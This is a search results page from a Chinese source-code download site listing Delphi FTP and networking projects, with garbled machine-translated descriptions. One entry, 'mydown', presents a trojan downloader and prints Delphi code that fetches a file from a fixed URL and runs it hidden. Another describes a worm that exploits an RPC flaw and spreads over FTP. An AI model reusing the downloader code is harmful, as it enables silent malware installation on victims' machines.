Welcome![Sign In][Sign Up]
Location:
Search - delphi ftp

Search list

[Delphi VCLics2000-2-2

Description: 包含常用Internet协议TCP,UDP、HTTP、FTP、Telnet等,此版本新增加一个THttpServ构件-commonly used Internet protocols include TCP, UDP, HTTP, FTP, Telnet, this new version of a component THttpServ
Platform: | Size: 996352 | Author: | Hits:

[Ftp ServerICS_FTPServer

Description: FTPServer ICS 网络 互联网 Socket使用ICS做的FTP服务器程序-FTPServer ICS Socket Internet network using ICS do FTP server
Platform: | Size: 191488 | Author: 凉凉 | Hits:

[Process-Thread爱虫病毒

Description: 病毒吧~因为该变种病毒不但要攻击RPC漏洞,还会将自身复制到%system%\Wins文件夹下,创建FTP服务和Wins Client服务。其中FTP服务开启系统的FTP功能用于传播病毒。“冲击波杀手”感染一台机器后就会使用Ping命令或ICMP echo方式探测随机产生的IP地址是否有效,如果有效便开始进行攻击。该病毒会在受感染的系统中随机使用666-765端口与攻击系统进行连接。该病毒还会检查系统版本和微软补丁包的版本号,然后根据不同的操作系统尝试从微软下载有关RPC漏洞的补丁程序,并自动运行补丁程序,给系统打上RPC漏洞的补丁-virus because it was not only the variant of the virus to attack RPC vulnerability, but also copies itself into% system% \ Wins folder, FTP services and the creation Wins Client services. FTP services which opened the FTP function for the transmission of the virus. "Shock killer" an infected machine will be used after the Ping orders or ICMP echo mode detection randomly generated IP address whether and, if they start to attack. The virus in infected systems use random ports 666-765 and attack systems for the connection. The virus will also inspect system version and Microsoft patch version, then under different operating systems to try to download the Microsoft RPC vulnerability patches, and automatically patch to the RPC loopholes permitting system patches
Platform: | Size: 2048 | Author: 美美 | Hits:

[Proxy Serverhandserver

Description: 此程序是一个FTP代理服务器 将它安装在第三方INternet服务器上,配置好相关参数,它即可以自动实现动态IP情况下的 FTP上传和下载-this procedure is a FTP proxy servers installed in its third INternet server, configure parameters, it can automatically realize that the dynamics of the IP FTP upload and download
Platform: | Size: 2663424 | Author: 张红卫 | Hits:

[SNMP200308140426306265

Description: 基于SNMP、FTP、HTTP等通讯方式的源码集合-This program is Code integrated that based on SNMP FTP HTTP communication and so on.
Platform: | Size: 658432 | Author: kk | Hits:

[OA全球办公自动化系统源代码

Description: 本系统在一些大中型企业(跨多达24个区域)一直都在很好的服务过,主要在FTP 控制 UDP控制 HTTP控制 傁客户数据库 数据库 数据压缩加密方面进行了综合深入的应用- This system (cross reaches 24 regions) in some large and middle scale enterprises continuously all in the very good service, mainly controlled UDP in FTP to control the HTTP control 鈻
Platform: | Size: 8848384 | Author: 停留 | Hits:

[Button control用IdFTPServer写的一个FTPServer程序

Description: 用IdFTPServer写的一个FTPServer程序 可以方便FTP的编写- A FTPServer procedure writes which with IdFTPServer may facilitate FTP the compilation
Platform: | Size: 94208 | Author: zhou | Hits:

[Ftp Serverboyle_ftpupdate

Description: 网站文件在本地更新多了以后,要将本地更新文件上传服务器时候再一一找出更新过的文件比较麻烦。设计初衷就是为了解决这个问题,同时也为了练手。代码没有什么难度,主要是为了学习FTP传输和文件操控。设计中有两种文件扫描方式,对比扫描则是通过对比用户提供的时间了扫描本地更新文件;实时扫描则以服务器上文件时间与本地文件时间进行对比来扫描文件,因此最好服务器和本地系统时间相差不要太离谱。在D7和XP下开发。 -website updated in the local paper after more than that for local update server upload time again on January 1 updated to identify the papers trouble. Originally designed in order to solve this problem, but also to practice hand. Code not difficult, mainly to learn FTP file transfer and manipulation. Two design document scanning, contrast scanning is provided by comparing the user's local time scanning updates; While real-time scanning files on the server time to time with the local paper compared to scan documents, the best server and the local system the difference in time will not be too outrageous. In D7 and XP development.
Platform: | Size: 278528 | Author: | Hits:

[Windows DevelopLogin_delphi

Description: delphi7实现登录界面的控制,及获取本机的信息的功能及FTP功能的部分实现-delphi7 achieve login interface control, and access to this information for the function and FTP functions partially
Platform: | Size: 1011712 | Author: 军军 | Hits:

[Ftp ClientauFTPDemo

Description: 自动接收ftp帐号下的文件,可以定时接收-ftp account automatically receive the document, can regularly receive
Platform: | Size: 220160 | Author: 杨晓琦 | Hits:

[OtherTIdFTP实现文件上传

Description: 一个小的ftp程序,用dephi实现供大家参考 ,我是专发这个程序,-a small ftp program, dephi achieve for your reference, I was specifically made for the process,
Platform: | Size: 303104 | Author: luyu | Hits:

[OS programIndy_FTP

Description: 基於indy的ftp service軟件-ftp service software
Platform: | Size: 1907712 | Author: mama | Hits:

[Internet-Networkmydown

Description: 执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadFile(SourceFile, DestFile: string): Boolean begin GetMem(u,100) GetMem(l,100) u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址 l:= c:/downpage.txt //改为你要存放并打开文件的路径 try Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0 except Result := False end end begin if DownloadFile(u, l) then begin ShellExecute(0, PChar( open ), PChar(l), PChar( ), nil, 0) end //freemem(u) //freemem(l) end. 先试一下。。。。 ok, 明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R*. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http :// www.jm-my.com/ip2.txt// read you want to download the website l : = c :/downpage.txt// read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Platform: | Size: 1024 | Author: 韩冰 | Hits:

[Internet-Networktftp_delphi

Description: 一个TFTP的简单程序,包括客户端和服务器端,是我大学本科的作业。-a TFTP simple procedures, including client and server side, I college work.
Platform: | Size: 1177600 | Author: 文正 | Hits:

[P2PShareaza_2.2.3.0_source

Description: Shareaza_2.2.3.0_source Shareaza是一款在国外评价极高并且相当流行的P2P软件(简称Raza),它集合了eDonkey、Guntella(1和2)和BT四种流行P2P网络类型,并可以用于Http下载,在以后的版本将会支持FTP下载,由于其优秀的界面(支持换肤)、简洁的操作以及极强的可制定性,所以在国外广为流传,其评价已跃居所有P2P软件的前5之列,并且许多P2P的下载站点已将其指定为BT的官方下载工具!-Shareaza_2.2.3.0_source Shareaza is one of the country Foreign highly evaluated and the very popular P2P software (Raza), which consists of eDonkey, Guntella (1 and 2) and four popular BT peer-to-peer network types, Http and can be used for downloading, in the future version will support FTP download, Because of its excellent interface (skinnable), simple operation and the development of extremely strong, so well-known abroad, Its assessment has leapt all P2P software in the top five performers. and many P2P download site has been designated as the official BT download tool!
Platform: | Size: 3607552 | Author: 谭朋柳 | Hits:

[Delphi/CppBuilderdelphiHelp

Description: 含此文档只表示此压缩包来自于DELPHI盒子网站 ------------------------------------------------------------------------- DELPHI盒子 二零零三新版 http://www.2ccc.com http://www.delphibox.com Email:root@2ccc.com DELPHI相关源码下载,作品发布,个性论坛,支持WEB/FTP文件上传,会员WEB空间,VIP会员***@2ccc.com邮箱。 2ccc技术论坛 http://bbs.2ccc.com 2ccc个人网络空间,免费8M永久使用web空间,可以上传任何文件,上传进度显示,送个人留言板,VIP会员可申请100M空间。 http://my.2ccc.com 2003-9-25 第9次改版正式开通,每日更新。 -------------------------------------------------------------------------- DELPHIBOX New Version @ 2003 http://www.2ccc.com http://www.delphibox.com Email:root@2ccc.com DELPHI Code,App,Simple to Publish,forum,WEB/FTP uploads Support,member WEB Space or email addr. 2ccc Tech Forum. http://bbs.2ccc.com 2ccc Web Space,Free 8M Space,Upload any file-type. http://my.2ccc.com 2003-9-25 New Version WebSite ninthly,Update everyday.-with this document only said that the package of compressed from the box DELPHI website---------------------------------------------------- DELPHI box--------------------- 2003 New http :// www.2ccc.com http :// www.delphibox.com Email : root@2ccc.com DELPHI relevant source download, works published, personality Forum support Web/FTP file uploads, Member Web space, VIP Member*** @ 2ccc.com mail. 2ccc Technical Forum http://bbs.2ccc.com 2ccc personal network space, 8 M permanent free use of web space, can upload any document upload progress indicates that sent personal message board, VIP members can apply for 100 M space. Http://my.2ccc.com 2003-9-25 9th revision opened updated daily.-------------------------------------------------------------------------- DELPHI New Version @
Platform: | Size: 1494016 | Author: | Hits:

[Delphi VCLIndy9Demos

Description: 好的Indy控件集,用来可以用来做邮件群发,FTP上传等等,功能多得让你想不到。-Indy good control set, to be used for mail listserv, FTP upload, etc., More functions let you can not think of.
Platform: | Size: 1403904 | Author: 肖滔 | Hits:

[Ftp Clientthread_Tcpserver_client_code

Description: 多线程网络传输代码,从网络棋牌游戏中整理出这个献给大家:) 开发环境:Delphi7.0+WinXP,没用其他控件(除了Delphi自带的Indy) 使用协议:TCP/IP 客户端一次发送65000字节的包,服务端负责组装并处理数据粘连。 使用ReadBuffer(),Send()函数来接收发送Buffer内字节,这样作的目的是使程序具有更好的灵活性。你可以自定义Buffer内那些字节的含义,例如是字符串、图像、声音、命令等等。 文件的多线程读写采用windows内存映像技术。 关键的服务器处理函数IdTCPServer1Execute(AThread: TIdPeerThread)是非线程安全的。如果使用临界区,那么多线程将在这里串行执行,严重降低多线程效率。对此,我采用一个简单的办法,具体可以看程序。
Platform: | Size: 56320 | Author: 红鱼 | Hits:

[Delphi VCLdephi

Description: Dephi实现的ftp传输软件,欢迎大家交流 -Delphi realize the ftp transmission software, welcomed the exchange of U.S.
Platform: | Size: 16384 | Author: zhw | Hits:

[Ftp ServerFtpServer

Description: 简单的ftp服务器例子代码.基本功能都有. 完全delphi代码。-Simple ftp server code example. The basic functions. Full delphi code.
Platform: | Size: 183296 | Author: xionglonghui | Hits:
« 1 2 3 4 5 67 8 9 10 11 12 »

CodeBus www.codebus.net